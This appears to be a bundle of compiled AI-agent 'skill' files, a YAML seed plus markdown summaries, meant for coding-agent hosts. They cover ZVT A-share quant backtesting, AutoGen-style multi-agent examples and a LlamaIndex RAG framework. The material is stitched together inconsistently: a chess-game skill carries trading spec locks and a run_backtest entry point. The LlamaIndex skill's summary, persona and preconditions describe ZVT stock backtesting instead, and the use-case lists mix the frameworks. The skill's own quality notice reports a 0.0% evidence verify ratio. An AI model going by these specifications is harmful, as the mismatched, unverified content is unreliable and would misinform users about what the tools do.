    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-136 / Two-agent code-writer + code-executor pair (Chess game)
    version: v6.1
    intent_keywords:
    - chess
    - game
    - two-agent
    - rule-checker
    - RoundRobin
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (2 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 11
        ucs:
        - uc_id: UC-001
          name: Two-agent code-writer + code-executor pair (Chess game)
          short_description: Build a two-agent chess game with a code-writer agent (LLM) and a code-executor agent (Docker)
            using RoundRobinGroupChat with TextMentionTermination("
          sample_triggers:
          - chess
          - game
          - two-agent
        - uc_id: UC-002
          name: Tool-augmented assistant with MCP server
          short_description: Wire AssistantAgent with an MCP server (e.g., playwright) via Workbench abstraction; agent auto-discovers
            tools and can drive a browser
          sample_triggers:
          - MCP
          - tool-use
          - web-browsing
        - uc_id: UC-003
          name: Multi-agent travel planner with handoffs (Swarm)
          short_description: 'Multi-agent travel planning with explicit handoffs between specialist agents (Alice ↔ Bob) using
            Swarm; first agent must produce HandoffMessage; team '
          sample_triggers:
          - swarm
          - handoff
          - multi-agent-routing
        - uc_id: UC-004
          name: Magentic-One ledger-orchestrated team
          short_description: Complex autonomous orchestration with facts → plan → progress ledger pattern
          sample_triggers:
          - magentic-one
          - ledger
          - plan
        - uc_id: UC-006
          name: FastAPI-hosted agent with HTTP UI
          short_description: Host a team behind a FastAPI route + JS client over EventSource / WebSocket
          sample_triggers:
          - web-API
          - FastAPI
          - streaming
        - uc_id: UC-007
          name: Distributed agents over gRPC
          short_description: Per-agent process / multi-process distributed deployment using WorkerAgentRuntime and a host
            process
          sample_triggers:
          - distributed
          - gRPC
          - worker
        - uc_id: UC-008
          name: Cross-language agents (Python ↔ .NET)
          short_description: Python and .NET agents share protobuf message types from `protos/` and communicate over gRPC
          sample_triggers:
          - cross-language
          - .NET
          - polyglot
        - uc_id: UC-009
          name: Code-executor agent with LLM-based approval gate
          short_description: One LLM gates code from another LLM (LLM-as-judge approval)
          sample_triggers:
          - code-execution
          - approval-gate
          - LLM-as-judge
        - uc_id: UC-010
          name: Selector-based routing for multi-skill team
          short_description: LLM picks the right specialist per turn from descriptions of travel_advisor / hotel_agent / flight_agent
          sample_triggers:
          - selector
          - role-routing
          - multi-skill
        - uc_id: UC-011
          name: Custom selector function (state-machine routing)
          short_description: Deterministic alternation between two agents using a Python callable as `selector_func` that
            returns the next-speaker name based on last message conte
          sample_triggers:
          - state-machine
          - deterministic-routing
          - selector_func
        - uc_id: UC-012
          name: Human-in-the-loop with UserProxyAgent + HandoffTermination
          short_description: Pause team execution when an agent hands off to "user"; caller resumes by appending a HandoffMessage
            and continuing the stream
          sample_triggers:
          - human-in-the-loop
          - HITL
          - user-proxy
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-005
          name: GraphRAG-augmented assistant
          short_description: AssistantAgent with global_search + local_search tools over a GraphRAG-indexed dataset
          sample_triggers:
          - GraphRAG
          - RAG
          - graph-search
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try two-agent code-writer + code-executor pair (chess game)
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try tool-augmented assistant with mcp server
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try multi-agent travel planner with handoffs (swarm)
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 12 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Multi-agent travel planner with handoffs (Swarm)
    - Tool-augmented assistant with MCP server
    - Two-agent code-writer + code-executor pair (Chess game)
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Backend+2

T@clawhub-tangweigang-jpg-8679fec286

Llama Index Rag

Skill

LlamaIndex：把任意文档变 LLM 可查询知识的 Python 框架。4 大支柱（Index/Retriever/QueryEngine/Synthesizer）+ 52 条 anti-pattern 约束（5 fatal）。 LlamaIndex: a Python framework that tur...

---
name: llama-index-rag
description: |-
  LlamaIndex：把任意文档变 LLM 可查询知识的 Python 框架。4 大支柱（Index/Retriever/QueryEngine/Synthesizer）+ 52 条 anti-pattern 约束（5 fatal）。
  LlamaIndex: a Python framework that turns arbitrary documents into queryable, LLM-grounded knowledge. The four-pillar core (Index / Retriever / QueryEngine / ResponseSynthesizer) wires a configurable retrieve-then-synthesize loop;
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-135"
  blueprint_source: "run-llama/llama_index"
  blueprint_commit: "0a6c90bfd610dcc66dcb89ed3e1d905c5e9bf6dc"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/llama-index-rag"
  openclaw:
    skillKey: llama-index-rag
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

LlamaIndex 是把任意文档变成 LLM 可查询知识的 Python 框架（github.com/run-llama/llama_index）。四大支柱（Index / Retriever / QueryEngine / ResponseSynthesizer）配置化检索-合成循环；Ingestion pipeline 处理 Document → Node → Embedding → Index 转换，带 content-hash 缓存；workflow / agent 子模块（FunctionAgent / ReActAgent / CodeActAgent / multi-agent...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/llama-index-rag

## 知识规模

- **52 条约束** (5 fatal + 47 non-fatal)
- 上游源码: `run-llama/llama_index` @ commit `0a6c90bf`
- 蓝图 ID: `finance-bp-135`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合做企业知识库、文档问答、RAG 应用的工程师：从 PDF / Markdown / 网页等异构文档构建索引，结合 retrieve-then-synthesize 给 LLM 提供外部知识。覆盖 FunctionAgent / ReActAgent / CodeActAgent 等 agent 范式。访问 doramagic.ai/r/llama-index 查看完整用例。

### 需要准备什么环境？依赖什么？
Python 3.9+，至少一个 LLM provider（默认隐式 OpenAI gpt-3.5-turbo）和一个 embedding provider（默认隐式 OpenAI text-embedding-ada-002 → 1536 维）。默认用内存 SimpleVectorStore，持久化需安装对应集成包。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 52 条约束（5 条 fatal）。典型踩坑：(1) ServiceContext 已硬删除（不是 deprecated），3 个入口直接 raise ValueError；(2) SentenceSplitter chunk_overlap 默认 200（与文档常引用的 constants.DEFAULT_CHUNK_OVERLAP=20 不一致）；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/llama-index-rag

FILE:human_summary.md
# finance-bp-135-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Sub-question decomposition over multi-doc corpus
- Hybrid (dense + sparse) retrieval with QueryFusionRetriever
- Standard RAG over local files
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-135-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-135-v6.1
  version: v6.1
  blueprint_id: finance-bp-135
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:07:14.457065+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL warn/fail + 5 DAT warn/fail/pass = 31 items reviewed across
      applicable scope
    audit_pass_rate: 1/11 (9% applicable items pass; 10 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-135. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-135-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Standard RAG over local files
    positive_terms:
    - RAG
    - VectorStoreIndex
    - from_documents
    - as_query_engine
    data_domain: mixed
    negative_terms:
    - agent
    - workflow
    - tool calling
    ambiguity_question: Single-shot Q&A over docs vs. multi-turn chat (use ChatEngine) vs. tool-calling (use FunctionAgent)
  - uc_id: UC-002
    name: Hybrid (dense + sparse) retrieval with QueryFusionRetriever
    positive_terms:
    - hybrid
    - fusion
    - RRF
    - BM25
    - ensemble
    data_domain: mixed
    negative_terms:
    - semantic_hybrid
    - auto_merging
    ambiguity_question: QueryFusion (multi-query) vs. SEMANTIC_HYBRID (single-query, vector-store-native hybrid)
  - uc_id: UC-003
    name: Sub-question decomposition over multi-doc corpus
    positive_terms:
    - sub-question
    - decomposition
    - multi-doc
    - compare
    data_domain: mixed
    negative_terms:
    - agent
    - react
    ambiguity_question: SubQuestion (LLM decomposes once, fans out) vs. Agent (loop with tool calls)
  - uc_id: UC-004
    name: Auto-merging retrieval with hierarchical chunks
    positive_terms:
    - auto-merging
    - hierarchical
    - parent-child
    - recursive
    data_domain: mixed
    negative_terms:
    - semantic_splitter
    ambiguity_question: Auto-merging (coverage-based merge) vs. RecursiveRetriever (IndexNode hops)
  - uc_id: UC-005
    name: Function-calling agent with tool-equipped LLM (workflow-based)
    positive_terms:
    - agent
    - function calling
    - tool
    - FunctionAgent
    - workflow
    data_domain: mixed
    negative_terms:
    - react
    - codeact
    ambiguity_question: FunctionAgent (native tools) vs ReActAgent (text-based) vs CodeActAgent (code execution)
  - uc_id: UC-006
    name: Multi-agent workflow with specialized agents
    positive_terms:
    - multi-agent
    - AgentWorkflow
    - handoff
    - orchestration
    data_domain: mixed
    negative_terms:
    - single agent
    ambiguity_question: Multi-agent (handoff between agents) vs. agents-as-tools (one root agent calls others)
  - uc_id: UC-007
    name: Property graph index for structured knowledge extraction
    positive_terms:
    - knowledge graph
    - property graph
    - entity extraction
    - Cypher
    data_domain: mixed
    negative_terms:
    - vector
    ambiguity_question: PropertyGraph (LPG, schema-aware) vs. KnowledgeGraphIndex (legacy triple store)
  - uc_id: UC-008
    name: RAG over SQL databases with NL→SQL
    positive_terms:
    - SQL
    - NLSQL
    - text2sql
    - structured
    data_domain: mixed
    negative_terms:
    - vector only
    ambiguity_question: SQLAutoVector (router) vs SQLJoin (combine) vs pgvector_sql_query_engine (single backend)
  - uc_id: UC-009
    name: Custom workflow with checkpointing and human-in-the-loop
    positive_terms:
    - workflow
    - checkpoint
    - human-in-the-loop
    - step
    - event
    data_domain: mixed
    negative_terms:
    - agent
    - query engine
    ambiguity_question: Workflow (general DAG) vs Agent (LLM-driven loop) vs QueryEngine (one-shot pipeline)
  - uc_id: UC-010
    name: Citation-tracked RAG
    positive_terms:
    - citation
    - source attribution
    - footnote
    data_domain: mixed
    negative_terms:
    - no_text
    ambiguity_question: CitationQueryEngine (LLM emits citations) vs. NodeWithScore source list (programmatic only)
  - uc_id: UC-011
    name: Query transformations (HyDE, multi-step decomposition)
    positive_terms:
    - HyDE
    - multi-step
    - query rewrite
    - hypothetical document
    data_domain: mixed
    negative_terms:
    - fusion
    ambiguity_question: HyDE (single rewrite) vs. multi-step (sequential refinement) vs. fusion (parallel variants)
  - uc_id: UC-012
    name: Document summarization index
    positive_terms:
    - document summary
    - summary index
    - DocumentSummaryIndex
    data_domain: mixed
    negative_terms:
    - chunks
    - vector
    ambiguity_question: DocumentSummaryIndex (doc-level) vs. SummaryIndex (linear list) vs. TreeIndex (hierarchical)
  - uc_id: UC-013
    name: Ingestion pipeline with cache and dedup
    positive_terms:
    - ingestion
    - pipeline
    - ETL
    - cache
    - dedup
    data_domain: mixed
    negative_terms:
    - from_documents
    ambiguity_question: IngestionPipeline (DAG with cache) vs. BaseIndex.from_documents (one-shot)
  - uc_id: UC-014
    name: Custom node postprocessor / reranker
    positive_terms:
    - rerank
    - postprocess
    - MMR
    - lost-in-the-middle
    data_domain: mixed
    negative_terms:
    - raw retrieval
    ambiguity_question: LLMRerank (slow, accurate) vs SentenceTransformerRerank (fast cross-encoder) vs LongContextReorder
      (no model)
  - uc_id: UC-015
    name: Structured output with Pydantic / Output parsers
    positive_terms:
    - pydantic
    - structured output
    - JSON mode
    - function calling
    data_domain: mixed
    negative_terms:
    - text
    - string
    ambiguity_question: Native function calling (FunctionAgent) vs. response_synthesizer output_cls (parse on synthesis)
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
